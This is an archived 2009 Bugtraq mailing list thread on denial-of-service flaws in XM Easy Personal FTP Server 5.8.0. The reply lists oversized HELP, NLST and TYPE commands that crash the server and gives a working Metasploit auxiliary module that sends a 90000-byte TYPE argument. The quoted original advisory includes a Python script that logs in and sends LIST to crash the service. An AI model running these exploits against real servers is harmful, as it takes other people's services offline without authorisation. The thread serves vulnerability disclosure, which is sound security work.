Bugtraq mailing list archives
Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
From: Protek Research Lab <protekresearchlab () yahoo ca>
Date: Tue, 10 Nov 2009 13:37:54 -0800 (PST)
Hi,
It's seem to have much more bugs then what you listed in your advisory.
It's possible to DoS the server with this 3 others commands;
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but
even anonymous can do it as long as it has permission
to call Type.
},
'Author' => 'Francis Provencher, Protek Research Lab',
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' => [
[ 'URL', ' http://protekresearch.blogspot.com]
],
'DisclosureDate' => '2009/11/10')
)
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
])
end
def run
return unless connect_login
raw_send_recv("TYPE #{'A' * 90000}\r\n")
disconnect
print_status("OK, server may still be technically listening, but it won't respond")
end
end
have a nice Day!
--- On Tue, 11/10/09, zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn> wrote:
From: zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn>
Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
To: bugtraq () securityfocus com
Received: Tuesday, November 10, 2009, 3:07 AM
Date of Discovery: 10-Nov-2009
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server
Application. Denial of service vulnerability exists in XM
Personal FTP Server that causes the application to crash
when the "LIST" is sent to FTP server if you do not use
"PASV" or "POST" first.
Details:
XM Easy Personal FTP Server can't handle "LIST" command if
you do not use "PASV" or "POST" first.If you have logged on
the server successfully,a "LIST" command will lead the ftp
server to crash.
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py
<serv_ip> <Username>
<password>\n")
print ("Example:./expl.py 192.168.48.183
anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("LIST\r\n")
sock.close()
sys.exit(0);
__________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at
http://downloads.yahoo.com/ca/internetexplorer/
Current thread:
- XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability zhangmc (Nov 10)
- Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability Protek Research Lab (Nov 12)